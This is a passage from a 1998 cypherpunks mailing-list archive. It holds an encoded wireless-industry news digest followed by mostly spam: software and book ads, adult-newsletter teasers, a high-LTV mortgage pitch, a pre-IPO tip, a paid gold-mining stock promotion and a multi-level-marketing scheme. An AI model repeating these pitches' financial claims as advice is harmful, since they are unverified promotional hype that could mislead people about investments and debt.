Z2lzbGF0aW9uIGFpbWVkIGF0IGVhc2luZyB0aGUgY29tcHV0ZXIgYW5kIGxl
Z2FsIHByb2JsZW1zIG9mCnRoZSBZMjAwMCBjcmlzaXMuICg8QSBIUkVGPSJo
dHRwOi8vd3d3Lndhc2hpbmd0b25wb3N0LmNvbS93cC1zcnYvd2FzaHRlY2gv
ZGFpbHkvc2VwdDk4L3kyazA5MTc5OC5odG0iPldBU0hQT1NUPC9BPikKKDxB
IEhSRUY9Imh0dHA6Ly93d3cud2lyZWQuY29tL25ld3MvbmV3cy9wb2xpdGlj
cy9zdG9yeS8xNTA1Ny5odG1sIj5XSVJFRDwvQT4pCig8QSBIUkVGPSJodHRw
Oi8vd3d3LmFiY25ld3MuY29tL3NlY3Rpb25zL3RlY2gvRGFpbHlOZXdzL3ky
a19zZW5hdGU5ODA5MTYuaHRtbCI+QUJDTkVXUzwvQT4pPC9GT05UPjwvVEQ+
Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8VEQ+PEJSPjwv
VEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8VEQ+PEI+
PEZPTlQgRkFDRT0iQXJpYWwsSGVsdmV0aWNhIj48Rk9OVCBTSVpFPSsxPkx1
Y2VudCB0byBFeGFtaW5lIENoYXJnZXMKb2YgU2Fib3RhZ2UgYnkgQ2llbmE8
L0ZPTlQ+PC9GT05UPjwvQj48L1REPgoKPFREPjwvVEQ+CjwvVFI+Cgo8VFI+
CjxURD48L1REPgoKPFREPjxGT05UIEZBQ0U9IkFyaWFsLEhlbHZldGljYSI+
QXMgQ2llbmEgYmxhbWVzIG91dHNpZGUgcml2YWxzIGZvciBmYWlsZWQKbWVy
Z2VyIHdpdGggVGVsbGFicywgTHVjZW50IHdpbGwgZXhhbWluZSBpdHMgb3du
IGFsbGVnZWQgcm9sZS4gKDxBIEhSRUY9Imh0dHA6Ly93d3cudXNhdG9kYXku
Y29tL21vbmV5L21kczMuaHRtIj5VU0FUT0RBWTwvQT4pCig8QSBIUkVGPSJo
dHRwOi8vd3d3LndpcmVkLmNvbS9uZXdzL25ld3MvYnVzaW5lc3Mvc3Rvcnkv
MTUwNTguaHRtbCI+V0lSRUQ8L0E+KQooPEEgSFJFRj0iaHR0cDovL2ludGVy
YWN0aXZlLndzai5jb20vYXJ0aWNsZXMvU0I5MDU5ODM5ODAxOTk4NTAwMDAu
aHRtIj5XU0o8L0E+KTwvRk9OVD48L1REPgoKPFREPjwvVEQ+CjwvVFI+Cgo8
VFI+CjxURD48L1REPgoKPFREPjxCUj48L1REPgoKPFREPjwvVEQ+CjwvVFI+
Cgo8VFI+CjxURD48L1REPgoKPFREPjxCPjxGT05UIEZBQ0U9IkFyaWFsLEhl
bHZldGljYSI+PEZPTlQgU0laRT0rMT5SZXN0cmljdGlvbnMgb24gRW5jcnlw
dGlvbgpQb2xpY3kgRWFzZWQ8L0ZPTlQ+PC9GT05UPjwvQj48L1REPgoKPFRE
PjwvVEQ+CjwvVFI+Cgo8VFI+CjxURD48L1REPgoKPFREPjxGT05UIEZBQ0U9
IkFyaWFsLEhlbHZldGljYSI+UGxhbnMgdG8gcmVkdWNlIGV4cG9ydCByZXN0
cmljdGlvbnMgb24KcG93ZXJmdWwgZGF0YS1zY3JhbWJsaW5nIHRlY2hub2xv
Z3kgd2lsbCBoZWxwIGJ1c2luZXNzZXMgYmV0dGVyIHByb3RlY3QKdGhlaXIg
ZWxlY3Ryb25pYyBjb21tdW5pY2F0aW9ucy4gKDxBIEhSRUY9Imh0dHA6Ly93
d3cubnl0aW1lcy5jb20vbGlicmFyeS90ZWNoLzk4LzA5L2N5YmVyL2FydGlj
bGVzLzE3ZW5jcnlwdC5odG1sIj5OWVRJTUVTPC9BPikKKDxBIEhSRUY9Imh0
dHA6Ly93d3cudXNhdG9kYXkuY29tL2xpZmUvY3liZXIvemQvemQ1Lmh0bSI+
VVNBVE9EQVk8L0E+KQooPEEgSFJFRj0iaHR0cDovL3d3dy53YXNoaW5ndG9u
cG9zdC5jb20vd3Atc3J2L1dQbGF0ZS8xOTk4LTA5LzE3LzE2MmwtMDkxNzk4
LWlkeC5odG1sIj5XQVNIUE9TVDwvQT4pCig8QSBIUkVGPSJodHRwOi8vd3d3
LndpcmVkLmNvbS9uZXdzL25ld3MvcG9saXRpY3Mvc3RvcnkvMTUwMzcuaHRt
bCI+V0lSRUQ8L0E+KQooPEEgSFJFRj0iaHR0cDovL3d3dy5ib3N0b24uY29t
L2RhaWx5Z2xvYmUvZ2xvYmVodG1sLzI1OS9VU19zZWVuX2Vhc2luZ19lbmNy
eXB0aW9uX3Byb2R1Y3RfZS5zaHRtbCI+Qk9TVE9OPC9BPikKKDxBIEhSRUY9
Imh0dHA6Ly93d3cuYWJjbmV3cy5jb20vc2VjdGlvbnMvdGVjaC9EYWlseU5l
d3MvZW5jcnlwdGlvbjk4MDkxNy5odG1sIj5BQkM8L0E+KQooPEEgSFJFRj0i
aHR0cDovL3d3dy56ZG5ldC5jb20vemRubi9zdG9yaWVzL3pkbm5fc21ncmFw
aF9kaXNwbGF5LzAsNDQzNiwyMTM4MjUyLDAwLmh0bWwiPlpETkVUPC9BPikK
KDxBIEhSRUY9Imh0dHA6Ly9pbnRlcmFjdGl2ZS53c2ouY29tL2FydGljbGVz
L1NCOTA1OTkzNDEwNDg0OTk0MDAwLmh0bSI+V1NKPC9BPikKKDxBIEhSRUY9
Imh0dHA6Ly93d3cudGVjaHdlYi5jb20vd2lyZS9zdG9yeS9yZXV0ZXJzL1JF
VTE5OTgwOTE2UzAwMDEiPlRFQ0hXRUI8L0E+KTwvRk9OVD48L1REPgoKPFRE
PjwvVEQ+CjwvVFI+Cgo8VFI+CjxURD48L1REPgoKPFREPjxCUj48L1REPgoK
PFREPjwvVEQ+CjwvVFI+Cgo8VFI+CjxURD48L1REPgoKPFREPjxCPjxGT05U
IEZBQ0U9IkFyaWFsLEhlbHZldGljYSI+PEZPTlQgU0laRT0rMT5Hb0FtZXJp
Y2EgQW5ub3VuY2VzIEVuaGFuY2VkCldpcmVsZXNzIEUtTWFpbCBBcHBsaWNh
dGlvbiBGb3IgUGFsbVBpbG90PyBVbml0cyBXaXRoIE9uZS1Ub3VjaCBDb21t
dW5pY2F0b3KZCj5Gcm9tIEpQIFN5c3RlbXM8L0ZPTlQ+PC9GT05UPjwvQj48
L1REPgoKPFREPjwvVEQ+CjwvVFI+Cgo8VFI+CjxURD48L1REPgoKPFREPjxG
T05UIEZBQ0U9IkFyaWFsLEhlbHZldGljYSI+R29BbWVyaWNhIENvbW11bmlj
YXRpb25zIENvcnAuLCB0aGUgbmF0aW9uJ3MKbGVhZGluZyBXaXJlbGVzcyBJ
bnRlcm5ldCBTZXJ2aWNlIFByb3ZpZGVyLCBpcyBwcm92aWRpbmcgZW5oYW5j
ZWQgc2VydmljZXMKZm9yIGl0cyBHby5NYWlsIHdpcmVsZXNzIEUtbWFpbCBz
b2Z0d2FyZSBmb3IgdGhlIFBhbG1QaWxvdCBhbmQgUGFsbSBJSUkKY29ubmVj
dGVkIG9yZ2FuaXplcnMgd2l0aCB0aGUgaW50ZWdyYXRpb24gb2YgT25lLVRv
dWNoIENvbW11bmljYXRvciBmcm9tCkpQIFN5c3RlbXMsIGEgbGVhZGluZyBn
bG9iYWwgc29mdHdhcmUgZGV2ZWxvcGVyIGZvciB0aGUgYnVzaW5lc3MgYW5k
IHBlcnNvbmFsCndpcmVsZXNzIG1lc3NhZ2luZyBpbmR1c3RyeS4gKDxBIEhS
RUY9Imh0dHA6Ly93d3cud293LWNvbS5jb20vcmVzdWx0cy9wcm9mZXNzaW9u
YWwvbmV3cy9mcmFtZWluZGV4LmNmbT9hcnRpY2xlaWQ9MzQyMyI+V09XLUNP
TTwvQT4pPC9GT05UPjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFRE
PjwvVEQ+Cgo8VEQ+PEJSPjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4K
PFREPjwvVEQ+Cgo8VEQ+PEI+PEZPTlQgRkFDRT0iQXJpYWwsSGVsdmV0aWNh
Ij48Rk9OVCBTSVpFPSsxPlFVQUxDT01NIEFubm91bmNlcyBJbnRlbnRpb24K
dG8gUHJvY2VlZCBXaXRoIExlYXAgV2lyZWxlc3MgSW50ZXJuYXRpb25hbCBT
cGluLW9mZjwvRk9OVD48L0ZPTlQ+PC9CPjwvVEQ+Cgo8VEQ+PC9URD4KPC9U
Uj4KCjxUUj4KPFREPjwvVEQ+Cgo8VEQ+PEZPTlQgRkFDRT0iQXJpYWwsSGVs
dmV0aWNhIj5RVUFMQ09NTSBJbmNvcnBvcmF0ZWQgKE5hc2RhcTogUUNPTSkg
dG9kYXkKYW5ub3VuY2VkIHRoYXQgdGhlIFNlY3VyaXRpZXMgYW5kIEV4Y2hh
bmdlIENvbW1pc3Npb24gKFNFQykgaGFzIGluZGljYXRlZAp0aGF0IGl0IGhh
cyBubyBmdXJ0aGVyIGNvbW1lbnRzIHRvIHRoZSByZWdpc3RyYXRpb24gc3Rh
dGVtZW50IGZpbGVkIGJ5ClFVQUxDT01NJ3Mgc3Bpbi1vZmYgY29tcGFueSwg
TGVhcCBXaXJlbGVzcyBJbnRlcm5hdGlvbmFsLCBJbmMuICg8QSBIUkVGPSJo
dHRwOi8vd3d3Lndvdy1jb20uY29tL3Jlc3VsdHMvcHJvZmVzc2lvbmFsL25l
d3MvZnJhbWVpbmRleC5jZm0/YXJ0aWNsZWlkPTM0MjQiPldPVy1DT008L0E+
KTwvRk9OVD48L1REPgoKPFREPjwvVEQ+CjwvVFI+Cgo8VFI+CjxURD48L1RE
PgoKPFREPgo8SFIgV0lEVEg9IjEwMCUiPjwvVEQ+Cgo8VEQ+PC9URD4KPC9U
Uj4KCjxUUj4KPFREPjwvVEQ+Cgo8VEQ+PEZPTlQgRkFDRT0iQXJpYWwsSGVs
dmV0aWNhIj48Rk9OVCBTSVpFPS0xPkZvciBhZGRpdGlvbmFsIG5ld3MgYWJv
dXQKdGhlIHdpcmVsZXNzIGluZHVzdHJ5LS1pbmNsdWRpbmcgcGVyaW9kaWMg
bmV3cyB1cGRhdGVzIHRocm91Z2hvdXQgdGhlIGRheS0tdmlzaXQKPEEgSFJF
Rj0iaHR0cDovL3d3dy53b3ctY29tLmNvbSI+aHR0cDovL3d3dy53b3ctY29t
LmNvbS48L0E+PC9GT05UPjwvRk9OVD48L1REPgoKPFREPjwvVEQ+CjwvVFI+
Cgo8VFI+CjxURD48L1REPgoKPFREPgo8SFIgV0lEVEg9IjEwMCUiPjwvVEQ+
Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8VEQ+PEZPTlQg
RkFDRT0iQXJpYWwsSGVsdmV0aWNhIj48Rk9OVCBTSVpFPS0xPkNUSUEgRGFp
bHkgTmV3cyBmcm9tIFdPVy1DT00KaXMgdHJhbnNtaXR0ZWQgd2Vla2RheXMs
IGV4Y2VwdCBmb3IgaG9saWRheXMuIFZpc2l0IHVzIG9uIHRoZSBXb3JsZCBX
aWRlCldlYiBhdCA8QSBIUkVGPSJodHRwOi8vd3d3Lndvdy1jb20uY29tL3By
b2Zlc3Npb25hbCI+aHR0cDovL3d3dy53b3ctY29tLmNvbS9wcm9mZXNzaW9u
YWw8L0E+LiZuYnNwOzwvRk9OVD48L0ZPTlQ+Jm5ic3A7Cgo8UD48Rk9OVCBG
QUNFPSJBcmlhbCxIZWx2ZXRpY2EiPjxGT05UIFNJWkU9LTE+SWYgeW91IGFy
ZSBub3QgaW50ZXJlc3RlZAppbiByZWNlaXZpbmcgdGhlIENUSUEgRGFpbHkg
TmV3cyBmcm9tIFdPVy1DT00sIHBsZWFzZSBzZW5kIGEgbWVzc2FnZSB0bwo8
QSBIUkVGPSJtYWlsdG86dW5qb2luLUNUSUFfRGFpbHlfTmV3c0B1bTIudW5p
dHltYWlsLmNvbSI+dW5qb2luLUNUSUFfRGFpbHlfTmV3c0B1bTIudW5pdHlt
YWlsLmNvbTwvQT4uJm5ic3A7PC9GT05UPjwvRk9OVD4mbmJzcDsKCjxQPjxC
PioqKjxGT05UIEZBQ0U9IkFyaWFsLEhlbHZldGljYSI+PEZPTlQgU0laRT0t
MT4gVGhlIHRlcm0gInVuam9pbi1DVElBX0RhaWx5X05ld3NAdW0yLnVuaXR5
bWFpbC5jb20iCm11c3QgYmUgbGlzdGVkIGluIHRoZSBUTyBzZWN0aW9uIG9m
IHRoZSBlbWFpbC48L0ZPTlQ+PC9GT05UPiAqKio8L0I+Jm5ic3A7Cgo8UD48
Rk9OVCBGQUNFPSJBcmlhbCxIZWx2ZXRpY2EiPjxGT05UIFNJWkU9LTE+UGxl
YXNlIE5vdGU6IFNvbWUgb2YgdGhlCmxpbmtzIGluIHRvZGF5J3MgbmV3cyBh
cmUgdGltZSBzZW5zaXRpdmUuJm5ic3A7IFRob3NlIGxpbmtzIG1heSBub3Qg
YmUKYXZhaWxhYmxlIGFzIG5ld3MgY2hhbmdlcyB0aHJvdWdob3V0IHRoZSBk
YXkuJm5ic3A7IEFsc28sIHNvbWUgbmV3cyBzb3VyY2VzCm1heSBiZSBzdWJz
Y3JpcHRpb24tYmFzZWQgb3IgcmVxdWlyZSByZWdpc3RyYXRpb24uPC9GT05U
PjwvRk9OVD48L1REPgoKPFREPjwvVEQ+CjwvVFI+Cgo8VFI+CjxURD48L1RE
PgoKPFREPgo8SFIgV0lEVEg9IjEwMCUiPjwvVEQ+Cgo8VEQ+PC9URD4KPC9U
Uj4KPC9UQUJMRT48L0NFTlRFUj4KCjxDRU5URVI+Jm5ic3A7PC9DRU5URVI+
Cgo8L0JPRFk+CjwvSFRNTD4K
--Boundary..3996.1071713805.multipart/mixed--



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Aladdin Systems <aladdinspecials@LISTSERVER.DIGITALRIVER.COM>
Date: Thu, 17 Sep 1998 12:21:11 -0700 (PDT)
To: ALADDIN2@LISTSERVER.DIGITALRIVER.COM
Subject: Aladdin DropStuff for Windows - 25% off for you!
Message-ID: <11be01bde26b$84f2e1d0$75d2d1d0@c-kosel.digitalriver.com>
MIME-Version: 1.0
Content-Type: text/plain


************************************************

YOU HAVE RECEIVED THIS MAILING AS A RESULT OF JOINING OUR INFORMATION
LIST. BY DOWNLOADING ALADDIN FREEWARE AND PROVIDING US WITH YOUR NAME
AND EMAIL ADDRESS YOU INDICATED THAT YOU WOULD LIKE TO BE INFORMED OF
SPECIAL INFORMATION FOR ALADDIN CUSTOMERS. IF YOU WOULD LIKE TO BE
REMOVED FROM THIS LIST PLEASE REFER TO THE INSTRUCTIONS FOUND AT THE
BOTTOM OF THIS EMAIL.

************************************************

Dear Aladdin Expander User,

Did you know there's a new windows shareware utility from Aladdin
that just made cross-platform communication easier? It's called
Aladdin DropStuff, and if you send files back and forth to Mac
users, it'll make your life a whole lot happier! Already, early
users of DropStuff are telling us it's a godsend. For all the details
now, click here http://www.digitalriver.com/AladdinDSWin10/PC.

With Aladdin DropStuff for Windows, in addition to creating Zip
archives, you can also compress in the StuffIt format, the compression
standard for the Mac. So now, you can send a file from your PC to a
Mac user, and they can open it, edit it, and send it back to you
seamlessly and transparently! Or, if like lots of people, you use a
Mac at home and a PC at the office, DropStuff makes it even easier to
transmit and open files you send back and forth from home and work.

DropStuff is loaded with the power user features you need, like the
ability to compress and mail files in one easy step, right from the
Windows desktop with just a right mouse click! Plus, DropStuff lets
you join StuffIt file segments you may receive from a Mac user.
With Aladdin DropStuff, it's like your PC just learned to speak a
whole new language!

Aladdin DropStuff for Windows is a great deal at $20. But for a
limited time, we're offering DropStuff to Aladdin Expander users for
the amazing price of just $14.95! That's a savings of 25% on the
world's first universal compression utility for the PC!

Get DropStuff now at http://www.digitalriver.com/AladdinDSWin10/PC

This special price of $14.95 is for a limited time only! Don't miss
out on the savings.

*************************************************
If you would prefer to not receive Aladdin news and special offers
in the future do NOT reply to this message, instead:
   1. mailto:listserv@listserver.digitalriver.com
   2. Put "UNSUBSCRIBE ALADDIN-WIN" (without quotes) in the FIRST
      LINE of the message BODY
*************************************************


All the best,

Marty McGillivray
Aladdin DropStuff Product Manager




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: drussell@ix.netcom.com
Date: Thu, 17 Sep 1998 19:02:03 -0700 (PDT)
Subject: "Shamanism and the Drug Propaganda"
Message-ID: <199809180201.TAA11203@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


The Birth of Patriarchy and the Drug War. "A magnificent 

production." Prof. Richard Evans Schultes.

6"x9" Paperback, 365 Pages, 200 Illustrations, Quality Binding.

For an illustrated summary of each chapter, and online ordering,

go to http://www.kalyx.com.

 
 
 
 
 
 
 
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: STUFFED NEWS DAILY <stuffed@stuffed.net>
Date: Fri, 18 Sep 1998 02:32:03 -0700 (PDT)
To: (STUFFED FRIDAY SEPTEMBER 18 1998)
Subject: Oh boy, some goodies today, Elvis' sperm discovered/Rock stars' cock dildos?
Message-ID: <19980918071001.15223.qmail@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/plain


And as if the lead stories weren't enough, how about all the
FREE hot photos and sexy stories  to titilate and tantalise?
Or the  masses of ultra-weird news,  hot web sites and more.
We know you love to get Stuffed every day, so go on tuck in!

IN TODAY'S ISSUE:

 30 NEW EXTRA HOT JPEGS!
  5 NEW SIZZLING STORIES
   HYDE LIED - SO SAYS SALON MAGAZINE
    PICKING UP CHICKS IN THE GYM
     THE BEST OF EUREKA! - THE HOTTEST SITES
      COCK STARS - SUPERSTAR DILDOS?
       BLUE SUEDE OOZE - ELVIS' SPERM UNCOVERED
        EX COP, LEMONADE & STOLEN CARS
         THE DARWIN AWARDS - NATURAL DESELECTION
          TOTALLY BIZARRE NEWS - WHAT A CRAZY WORLD
           NUDESTOCK '98 - WHAT DID YOU MISS?
            WE SEND YOU TO HELL! :)

       ---->   http://stuffed.net/98/9/18/   <----

Welcome to  today's  issue of Stuffed. To read it you should
click on the URL above.  If it is not made clickable by your
email program  you will need to  use your mouse to highlight
the URL,  copy it and then paste it into your browser  (then
press Return).

This  email  is  never  sent  unsolicited.  Stuffed  is  the
supplement for the Eureka newsletter you subscribed to. Full
instructions on unsubscribing  are in every issue of Eureka!

       ---->   http://stuffed.net/98/9/18/   <----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "jmotes" <jmotes@mnsinc.com>
Date: Fri, 18 Sep 1998 09:50:10 -0700 (PDT)
To: <cypherpunks@toad.com>
Subject: No Subject
Message-ID: <020201bde324$4d924000$e401fea9@kathleen>
MIME-Version: 1.0
Content-Type: text/plain




SUBSCRIBE 


From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cvenden@webmail.bellsouth.net
Date: Fri, 18 Sep 1998 18:34:10 -0700 (PDT)
To: homeowners@anywherenet.com
Subject: ATTENTION ALL HOME OWNERS!!!
Message-ID: <19980919025114.606905d84f0d11d297290000c000128f.in@trip.it>
MIME-Version: 1.0
Content-Type: text/plain


Dear Homeowner:

Would you like to pay off all your bills? Do some home improvements?
Now you can!

There has never been a better time to take advantage of some of the lowest
interest rates in over two decades!

Zero out-of-pocket expense

Loan proceeds may be used for debt consolidation and/or home improvements, or a portion of loan amount can also be used for any purpose

Consolidate your debts into one, easy, low payment

Increase your cash flow

Pay off all your bills

No equity required! (Up to 135% loan-to-value)

No appraisal required for loan amounts $60,000 or less

Fixed rates and payments

Funding in as little as 7 -10 working days

Terms to 25 years or less

Interest may be tax deductible (Consult your tax advisor.)

1st or 2nd low interest mortgages also available

Here is an example of the savings you could receive:

	ITEM			DEBT		PAYMENT

		Credit Card #1	$5,000		$200/mo.
		Credit Card #2	$8,000		$320/mo.
		Credit Card #3	$7,250		$290/mo.
		Personal Loan	$7,750		$310/mo.

		Total		$28,000	      	$1120/mo.

Payment before:	$1120 per month
Payment after:	$337 per month

YOU SAVE $783 PER MONTH - OVER $9,300 IN CASH PER YEAR!

Isn't it time you got out from underneath the burden of all your debt? For
your FREE mortgage analysis visit our website. Remember, there is absolutely no obligation. 

CLICK HERE for more info...


****************************************************************
If you wish to be removed from this mailing list, 
click here and your request will be immediately honored.

@1998 West Coast Funding.  All rights reserved.</PRE></HTML>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: best25@worldonline.nl
Date: Sat, 19 Sep 1998 03:56:26 -0700 (PDT)
To: allofyou@aol.com
Subject: Ground Floor Pre-IPO Opportunity
Message-ID: <199809191057.GAA25805@nebula.hjford.com>
MIME-Version: 1.0
Content-Type: text/plain



Most Wall Street investors cannot participate on the upside of an IPO
since the investment firms reserve the stock for themselves. Get the
scoop and learn how to target these companies before they trade on the
NASDAQ Small Cap and Bulletin Board.

REMEMBER, THE MONEY IS ALWAYS MADE GOING INTO THE DEAL.

WANT MORE? Go To: Click Here















From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: STUFFED NEWS DAILY <stuffed@stuffed.net>
Date: Sat, 19 Sep 1998 23:05:53 -0700 (PDT)
To: (STUFFED SATURDAY SEPTEMBER 19 1998)
Subject: TAKE THE PRESIDENTIAL SEX TOUR/WOMAN WHO TURNED MONICA GREEN
Message-ID: <19980919071000.27541.qmail@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/plain


Today we have THREE RealVideo movies  showing Clinton
closely embracing Lewinsky on occasions spanning many
months.  See for yourself if the signs were there for
all to see...

IN TODAY'S ISSUE:

 30 NEW EXTRA HOT JPEGS!
  5 NEW SIZZLING STORIES
   TOPLESS DANCER WITH DANGEROUS BOOBS RE-ARRESTED
      FOR BEING TOO REVEALING
     PRESIDENTIAL SEX TOUR + VIDEOS
      THE INFAMOUS DRUDGE REPORT MAY BE IN TROUBLE
       THE BEST OF EUREKA!
        THE WOMAN WHO TURNED MONICA GREEN
         VIRGIN NO LONG-AIR
          MIND IF I GLUE MY FACE TO YOUR FOOT
           TOO MUCH HOMEWORK IS BAD FOR YOU
            RACE CAR MAMA USED TO BE A MAN
             MUCH MORE!

       ---->   http://stuffed.net/98/9/19/   <----

Welcome to  today's  issue of Stuffed. To read it you should
click on the URL above.  If it is not made clickable by your
email program  you will need to  use your mouse to highlight
the URL,  copy it and then paste it into your browser  (then
press Return).

This  email  is  never  sent  unsolicited.  Stuffed  is  the
supplement for the Eureka newsletter you subscribed to. Full
instructions on unsubscribing  are in every issue of Eureka!

       ---->   http://stuffed.net/98/9/19/   <----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: goldpromo@investormail.com
Date: Sun, 14 Feb 1999 21:43:27 -0800 (PST)
Subject: adv....ATTENTION : INVESTORS...HOT press release on developing mining company!
Message-ID: <272.775098.24874@user392009.snowcrash.activision.com>
MIME-Version: 1.0
Content-Type: text/plain



NOTE: Your name was added to our list because you have shown an interest in smart investing. If your name 
was added erroneously or you no longer wish to be on our mailing list, 
simply send "remove" to the "from address". 

For further information regarding this investment opportunity: Phone: (604) 681-6186

The Board of Directors of El Misti Gold Limited is pleased to summarize 
current diamond drill results for its wholly owned Sinchao Project in 
northern Peru located some 450 km north of Lima and 30 km from the 
Yanacocha Mine, South America's largest gold producer. These results 
confirm the presence of a large copper-gold-zinc-silver system with 
potentially economic grades amenable to open pit mining. The deposit 
remains open laterally in all directions and there is potential for several 
hundred million tonnes of mineralization. The analytical results were 
provided by Intertek Testing Services (Bondar Clegg). The quality 
assurance for all aspects of the diamond drill program has been 
provided by Howe Chile Ltda., a subsidiary of ACA Howe Ltd.
Drill holes SDH-10, SDH-5, SDH-6 and SDH-7 have delineated 
mineralization over a length of 640 metres and a width of 300 
metres with an average thickness of 478 metres. Preliminary 
test work indicates a specific gravity of 2.6. These measurements 
indicate a potential for a mineralized zone of approximately 239 million
 tonnes at a grade of 1.45g/t gold equivalent (Cu equiv. 0.84%). 
This includes 163 million tonnes at a grade of 1.70 g/t gold equivalent 
(Cu equiv. 0.99%) which includes 111 million tonnes at a grade of 2.18 
g/t gold equivalent (Cu equiv. 1.27 %). The mineralization is polymetallic 
whose value is derived approximately 38% from copper, 24% from gold, 
23% from zinc and 15% silver. The accompanying map (not available in 
e-mail format, please check the Company's web site) shows the area of 
mineralization defined by the current diamond drill results.

Additional results for drill hole SDH-10 and previously released results 
are set out in Table 1 and are summarized below. Gold and copper equivalent 
grades have been calculated for each of the significant mineralized intercepts 
on the basis of in-ground values using the following metal prices: US $287/oz 
gold, US $5.55/oz silver, US $0.72/lb copper, and US $0.52/lb zinc.

Hole SDH 10: 490 (1,181 feet) metres of mineralized intercept at a gold 
equivalent grade of 1.61 g/t (Cu equiv. 0.94 %).
Hole SDH-5: 495 (1,636 feet) metres of mineralized intercept at a gold 
equivalent grade of 1.59 g/t (Cu equiv. 0.92 %).
Hole SDH-6: 602 (1,850 feet) metres of mineralized intercept at a gold 
equivalent grade of 1.22 g/t (Cu equiv. 0.71 %).
Hole SDH-7: 592 (1,810 feet) metres of mineralized intercept at a gold 
equivalent grade of 1.36 g/t (Cu equiv. 0.79 %).

At Sinchao, to date, the Company has undertaken geological mapping, 
geochemical sampling and ground geophysics followed by drilling. 
During 1997, twelve RC holes (1,768 metres) were drilled and during 
1998, seven RC holes (1,174.5 metres) and ten diamond drill holes 
(5,176.25 metres) were drilled.

The Board is highly encouraged with the mineralization and potential 
of the Sinchao project and has retained well known and highly respected 
independent geologist Lindsay R. Bottomer, P. Geo to review all Sinchao 
project data and help the Board formulate the appropriate next steps for 1999.


NOTE: We strive to comply with all laws and to send information to interested parties only.
This message is not intended for, nor was it intentionaly sent to Washington state residents.
Mistigold has paid a fee of $500.00 for advertising on 2-14-1999




For further information regarding this investment opportunity: Phone: (604) 681-6186




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: STUFFED NEWS DAILY <stuffed@stuffed.net>
Date: Sun, 20 Sep 1998 13:07:25 -0700 (PDT)
To: (STUFFED SUNDAY SEPTEMBER 20 1998)
Subject: WHAT'S THE BETTING ON CLINTON?/NO NIBBLES FOR MONICA!
Message-ID: <19980920071000.7708.qmail@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/plain


IN TODAY'S ISSUE:

 30 NEW EXTRA HOT JPEGS!
  5 NEW SIZZLING STORIES
   DEALING WITH JEALOUSY
    MAGIC MISTRESS MATTRESS
     THE BEST OF EUREKA!
      DO I LOOK FAT IN THIS?
       BANGCOCK DISCK CHOP
        SEX SELLS!!!
         NO NIBBLES FOR MONICA
          FROM NUDISM TO BUDDHISM
           WHAT'S THE BETTING ON CLINTON?
            MUCH MORE!

       ---->   http://stuffed.net/98/9/20/   <----

Welcome to  today's  issue of Stuffed. To read it you should
click on the URL above.  If it is not made clickable by your
email program  you will need to  use your mouse to highlight
the URL,  copy it and then paste it into your browser  (then
press Return).

This  email  is  never  sent  unsolicited.  Stuffed  is  the
supplement for the Eureka newsletter you subscribed to. Full
instructions on unsubscribing  are in every issue of Eureka!

       ---->   http://stuffed.net/98/9/20/   <----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: asesor@ragnatela.miller.com.mx
Date: Sun, 20 Sep 1998 10:37:52 -0700 (PDT)
To: asesor@ragnatela.miller.com.mx
Subject: Comercialice su Negocio por Interne
Message-ID: <199809201737.KAA11388@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


///////////////////////////////////////////////////////////////////////////////
Vimos su anuncio en los Clasificados y pensamos que esta informacion
puede ser de su interes. Si usted no desea recibir mas mensajes de este
tipo, inserte la palabra "remove" en el Subject/Asunto y automaticamente
sera borrado de nuestra lista.
////////////////////////////////////////////////////////////////////////////////

Publicite su negocio a miles de personas de forma GRATUITA.

Visite nuestra pagina y obtenga GRATIS un programa para disear su pagina Web en
10 minutos:

                              http://www.miller.com.mx/biz.html








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jkeep@bigfoot.com
Date: Sun, 20 Sep 1998 23:39:46 -0700 (PDT)
To: jkeep@bigfoot.com
Subject: Get a free cell phone and much more.....
Message-ID: <199809210639.XAA10433@allcapecod.com>
MIME-Version: 1.0
Content-Type: text/plain



To be removed from future mailings please click reply and send with 

the word remove in the subject line

Here are several of the best in network opportunities

++++++++++++++++++++++++++++++++++++++++++++++++++++++++

FREE CELL PHONE and NO More Phone Bills!!!


Call! 1-800-600-0343 ext# 2107

VERY SIMPLE COMPENSATION PLAN: A 2 by 2 Forced

Company Matrix. Weekly Paychecks & Double Matching Bonus!

Get 2 Who Get 2 - Get Paid!

When you complete your first cycle you get $100 plus

FREE State-of-the-Art Ericson or NOKIA 6160 Digital and Analog PCS Cell

Phone! Caller ID, Voice Mail, E-Mail, Call Waiting, 3-Way

Calling, Built in 199 Names and Numbers directory, free battery and 

free charger, calendar, calculator,currency converter,

minute counter, A Great Phone!

and 600 minutes of service

FREE LOCAL and LONG DISTANCE CALLS On the #1

Wireless Network! No Roaming Charge! No Monthly Fees!

EVERY NETWORKER NEEDS THIS! Your Downline Needs This!!!

The perfect compliment to your existing business or . . .

a business opportunity all by itself.

REPLY TO THIS MESSAGE WITH cellular in the subject line

or go to http://www.thebestincellular.net for more info

OR CALL 1-800-600-0343 ext# 2107

WIPE OUT YOUR BIGGEST MARKETING EXPENSE -

YOUR PHONE BILL!

In addition, you receive An Ongoing Supply of "QUALIFIED"

BUSINESS OPPORTUNITY LEADS . . .

Choose 300 Fax Leads or . . .

300 Telemarketing Leads - Everytime you cycle and $200

